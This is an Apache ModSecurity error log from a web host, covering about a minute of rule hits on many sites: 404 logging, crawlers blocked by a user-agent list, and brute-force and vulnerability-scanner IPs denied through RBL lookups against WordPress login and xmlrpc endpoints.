[Tue May 26 14:05:15.829513 2026] [security2:error] [pid 578581:tid 578752] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbQ5m_8al1sb-umPuC8QAAACk"]
[Tue May 26 14:05:16.530057 2026] [security2:error] [pid 578581:tid 578765] [client 114.119.139.1:25673] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/index.php"] [unique_id "ahVbRJm_8al1sb-umPuDLgAAADY"], referer: http://glorodavionics.com/index.php?route=product%2Fmanufacturer%2Finfo&manufacturer_id=11&page=8
[Tue May 26 14:05:16.926806 2026] [security2:error] [pid 578581:tid 578750] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbRJm_8al1sb-umPuDLAAAACc"]
[Tue May 26 14:05:18.255142 2026] [security2:error] [pid 578581:tid 578823] [client 94.25.170.223:9758] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 223.170.25.94.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-comments-post.php"] [unique_id "ahVbRpm_8al1sb-umPuDVwAAAHA"], referer: http://rohiniventures.com/blog/2020/05/09/seo-friendly-business-theme/
[Tue May 26 14:05:18.255281 2026] [security2:error] [pid 578581:tid 578823] [client 94.25.170.223:9758] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "rohiniventures.com"] [uri "/wp-comments-post.php"] [unique_id "ahVbRpm_8al1sb-umPuDVwAAAHA"], referer: http://rohiniventures.com/blog/2020/05/09/seo-friendly-business-theme/
[Tue May 26 14:05:18.577723 2026] [security2:error] [pid 578581:tid 578786] [client 2a01:4f8:1c1f:9b4a::1:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahVbRpm_8al1sb-umPuDXQAAS3k"], referer: https://kingsclub.in/wp-login.php
[Tue May 26 14:05:18.864139 2026] [security2:error] [pid 578581:tid 578814] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbRpm_8al1sb-umPuDbAAAAGc"]
[Tue May 26 14:05:21.183774 2026] [security2:error] [pid 578581:tid 578835] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbSJm_8al1sb-umPuDtQAAAHw"]
[Tue May 26 14:05:22.381814 2026] [security2:error] [pid 578581:tid 578816] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbSZm_8al1sb-umPuD3wAAAGk"]
[Tue May 26 14:05:23.951719 2026] [security2:error] [pid 578581:tid 578768] [client 202.141.30.10:65490] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVbS5m_8al1sb-umPuEHwAAADk"]
[Tue May 26 14:05:23.951839 2026] [security2:error] [pid 578581:tid 578768] [client 202.141.30.10:65490] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVbS5m_8al1sb-umPuEHwAAADk"]
[Tue May 26 14:05:24.548200 2026] [security2:error] [pid 578581:tid 578783] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbTJm_8al1sb-umPuEKQAAAEg"]
[Tue May 26 14:05:26.617076 2026] [security2:error] [pid 578581:tid 578816] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbTpm_8al1sb-umPuEugAAAGk"]
[Tue May 26 14:05:27.266768 2026] [security2:error] [pid 578581:tid 578838] [client 62.244.225.226:29675] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahVbT5m_8al1sb-umPuE1QAAAH8"]
[Tue May 26 14:05:27.559157 2026] [security2:error] [pid 578581:tid 578815] [client 172.226.44.129:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbT5m_8al1sb-umPuE4QAAAGg"]
[Tue May 26 14:05:28.198948 2026] [security2:error] [pid 578581:tid 578834] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbT5m_8al1sb-umPuE9AAAAHs"]
[Tue May 26 14:05:30.251725 2026] [security2:error] [pid 578581:tid 578727] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbUZm_8al1sb-umPuFUgAAABA"]
[Tue May 26 14:05:31.510076 2026] [security2:error] [pid 578581:tid 578747] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbU5m_8al1sb-umPuFdAAAACQ"]
[Tue May 26 14:05:34.051356 2026] [security2:error] [pid 578581:tid 578815] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbVZm_8al1sb-umPuFwgAAAGg"]
[Tue May 26 14:05:34.703855 2026] [security2:error] [pid 578581:tid 578800] [client 70.22.159.144:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbVpm_8al1sb-umPuF2AAAAFk"]
[Tue May 26 14:05:34.856170 2026] [security2:error] [pid 578581:tid 578806] [client 202.141.30.10:65492] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVbVpm_8al1sb-umPuF8QAAAF8"]
[Tue May 26 14:05:34.856284 2026] [security2:error] [pid 578581:tid 578806] [client 202.141.30.10:65492] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVbVpm_8al1sb-umPuF8QAAAF8"]
[Tue May 26 14:05:35.170515 2026] [security2:error] [pid 578581:tid 578772] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbVpm_8al1sb-umPuF6AAAAD0"]
[Tue May 26 14:05:38.080407 2026] [security2:error] [pid 578581:tid 578837] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbWZm_8al1sb-umPuGOAAAAH4"]
[Tue May 26 14:05:38.090056 2026] [security2:error] [pid 578581:tid 578771] [client 182.253.143.251:42867] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "lmialumni.org"] [uri "/wp-comments-post.php"] [unique_id "ahVbWZm_8al1sb-umPuGPAAAADw"]
[Tue May 26 14:05:38.362597 2026] [security2:error] [pid 578581:tid 578771] [client 182.253.143.251:42867] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "302"] [hostname "lmialumni.org"] [uri "/wp-comments-post.php"] [unique_id "ahVbWZm_8al1sb-umPuGPAAAADw"]
[Tue May 26 14:05:38.362655 2026] [security2:error] [pid 578581:tid 578771] [client 182.253.143.251:42867] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "lmialumni.org"] [uri "/wp-comments-post.php"] [unique_id "ahVbWZm_8al1sb-umPuGPAAAADw"]
[Tue May 26 14:05:38.586017 2026] [security2:error] [pid 578581:tid 578667] [remote 146.196.64.107:43744] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.64.196.146.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/wp-login.php"] [unique_id "ahVbWpm_8al1sb-umPuGUgAAO1U"]
[Tue May 26 14:05:39.641287 2026] [security2:error] [pid 578581:tid 578815] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbW5m_8al1sb-umPuGdAAAAGg"]
[Tue May 26 14:05:39.641286 2026] [security2:error] [pid 578581:tid 578805] [client 182.253.143.251:42930] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "lmialumni.org"] [uri "/wp-comments-post.php"] [unique_id "ahVbW5m_8al1sb-umPuGhAAAAF4"]
[Tue May 26 14:05:39.712532 2026] [security2:error] [pid 578581:tid 578805] [client 182.253.143.251:42930] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "lmialumni.org"] [uri "/wp-comments-post.php"] [unique_id "ahVbW5m_8al1sb-umPuGhAAAAF4"]
[Tue May 26 14:05:40.653771 2026] [security2:error] [pid 578581:tid 578727] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbXJm_8al1sb-umPuGlwAAABA"]
[Tue May 26 14:05:41.130585 2026] [security2:error] [pid 578581:tid 578724] [client 182.253.143.251:42958] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "lmialumni.org"] [uri "/wp-comments-post.php"] [unique_id "ahVbXZm_8al1sb-umPuGqgAAAA0"]
[Tue May 26 14:05:41.204981 2026] [security2:error] [pid 578581:tid 578724] [client 182.253.143.251:42958] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "lmialumni.org"] [uri "/wp-comments-post.php"] [unique_id "ahVbXZm_8al1sb-umPuGqgAAAA0"]
[Tue May 26 14:05:42.595841 2026] [security2:error] [pid 578581:tid 578806] [client 182.253.143.251:43007] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "lmialumni.org"] [uri "/wp-comments-post.php"] [unique_id "ahVbXpm_8al1sb-umPuG1QAAAF8"]
[Tue May 26 14:05:42.672817 2026] [security2:error] [pid 578581:tid 578806] [client 182.253.143.251:43007] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "lmialumni.org"] [uri "/wp-comments-post.php"] [unique_id "ahVbXpm_8al1sb-umPuG1QAAAF8"]
[Tue May 26 14:05:42.994940 2026] [security2:error] [pid 578581:tid 578739] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbXpm_8al1sb-umPuG1AAAABw"]
[Tue May 26 14:05:44.067233 2026] [security2:error] [pid 578581:tid 578748] [client 182.253.143.251:43057] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "lmialumni.org"] [uri "/wp-comments-post.php"] [unique_id "ahVbYJm_8al1sb-umPuHBwAAACU"]
[Tue May 26 14:05:44.143722 2026] [security2:error] [pid 578581:tid 578748] [client 182.253.143.251:43057] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "lmialumni.org"] [uri "/wp-comments-post.php"] [unique_id "ahVbYJm_8al1sb-umPuHBwAAACU"]
[Tue May 26 14:05:44.307787 2026] [security2:error] [pid 578581:tid 578714] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbX5m_8al1sb-umPuG_QAAAAM"]
[Tue May 26 14:05:45.812014 2026] [security2:error] [pid 578581:tid 578730] [client 202.141.30.10:35385] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVbYZm_8al1sb-umPuHOgAAABM"]
[Tue May 26 14:05:45.812128 2026] [security2:error] [pid 578581:tid 578730] [client 202.141.30.10:35385] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVbYZm_8al1sb-umPuHOgAAABM"]
[Tue May 26 14:05:45.860351 2026] [security2:error] [pid 578581:tid 578804] [client 185.198.240.106:61049] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.240.198.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jiyani.in"] [uri "/wp-login.php"] [unique_id "ahVbYZm_8al1sb-umPuHMwAAAF0"]
[Tue May 26 14:05:47.115968 2026] [security2:error] [pid 578581:tid 578811] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbYpm_8al1sb-umPuHVQAAAGQ"]
[Tue May 26 14:05:48.565620 2026] [security2:error] [pid 578581:tid 578714] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbZJm_8al1sb-umPuHhwAAAAM"]
[Tue May 26 14:05:49.666773 2026] [security2:error] [pid 578581:tid 578782] [client 185.191.171.11:21520] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/july-21-25/day/2024-06-13/"] [unique_id "ahVbZZm_8al1sb-umPuHuAAAAEc"]
[Tue May 26 14:05:49.666882 2026] [security2:error] [pid 578581:tid 578782] [client 185.191.171.11:21520] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/july-21-25/day/2024-06-13/"] [unique_id "ahVbZZm_8al1sb-umPuHuAAAAEc"]
[Tue May 26 14:05:50.344639 2026] [security2:error] [pid 578581:tid 578821] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbZZm_8al1sb-umPuHwgAAAG4"]
[Tue May 26 14:05:51.696556 2026] [security2:error] [pid 578581:tid 578804] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbZ5m_8al1sb-umPuH7QAAAF0"]
[Tue May 26 14:05:53.519434 2026] [security2:error] [pid 578581:tid 578734] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbaZm_8al1sb-umPuIGQAAABc"]
[Tue May 26 14:05:55.075514 2026] [security2:error] [pid 578581:tid 578717] [client 185.165.240.73:29042] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVbapm_8al1sb-umPuIRQAAAAY"], referer: https://www.cagmedya.com/
[Tue May 26 14:05:55.839795 2026] [security2:error] [pid 578581:tid 578779] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVba5m_8al1sb-umPuIZQAAAEQ"]
[Tue May 26 14:05:56.294700 2026] [security2:error] [pid 578581:tid 578719] [client 14.178.29.126:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVba5m_8al1sb-umPuIdAAAAAg"]
[Tue May 26 14:05:56.861797 2026] [security2:error] [pid 578581:tid 578806] [client 202.141.30.10:35580] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVbbJm_8al1sb-umPuIlgAAAF8"]
[Tue May 26 14:05:56.861938 2026] [security2:error] [pid 578581:tid 578806] [client 202.141.30.10:35580] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVbbJm_8al1sb-umPuIlgAAAF8"]
[Tue May 26 14:05:57.401117 2026] [security2:error] [pid 578581:tid 578609] [remote 152.53.111.131:59438] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 131.111.53.152.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "crustiesplacebakery.com.thedebateafrica.org"] [uri "/wp-login.php"] [unique_id "ahVbbZm_8al1sb-umPuIpwAAPBs"]
[Tue May 26 14:05:57.427266 2026] [security2:error] [pid 578581:tid 578745] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbbJm_8al1sb-umPuIngAAACI"]
[Tue May 26 14:05:59.317736 2026] [security2:error] [pid 578581:tid 578796] [client 216.73.216.242:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "afstpaul.org"] [uri "/index.php"] [unique_id "ahVbbpm_8al1sb-umPuI4QAAAFU"]
[Tue May 26 14:05:59.456354 2026] [security2:error] [pid 578581:tid 578716] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbb5m_8al1sb-umPuI5gAAAAU"]
[Tue May 26 14:06:01.341336 2026] [security2:error] [pid 578581:tid 578783] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbcJm_8al1sb-umPuJGgAAAEg"]
[Tue May 26 14:06:03.187537 2026] [security2:error] [pid 578581:tid 578816] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbcpm_8al1sb-umPuJcQAAAGk"]
[Tue May 26 14:06:03.374791 2026] [security2:error] [pid 578581:tid 578802] [client 128.140.41.193:23364] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahVbc5m_8al1sb-umPuJiAAAAFs"], referer: http://ucdc.co.in/
[Tue May 26 14:06:03.665885 2026] [security2:error] [pid 578581:tid 578655] [remote 110.249.202.86:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "kingsclub.in"] [uri "/billiards/"] [unique_id "ahVbc5m_8al1sb-umPuJkwAAMEk"]
[Tue May 26 14:06:04.238544 2026] [security2:error] [pid 578581:tid 578792] [client 185.231.155.169:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVbcpm_8al1sb-umPuJfQAAAFE"], referer: http://anujtradingco.com/homepages/portfolio-photo/
[Tue May 26 14:06:04.882431 2026] [security2:error] [pid 578581:tid 578758] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbdJm_8al1sb-umPuJsAAAAC8"]
[Tue May 26 14:06:06.487696 2026] [security2:error] [pid 578581:tid 578800] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbdpm_8al1sb-umPuJ7QAAAFk"]
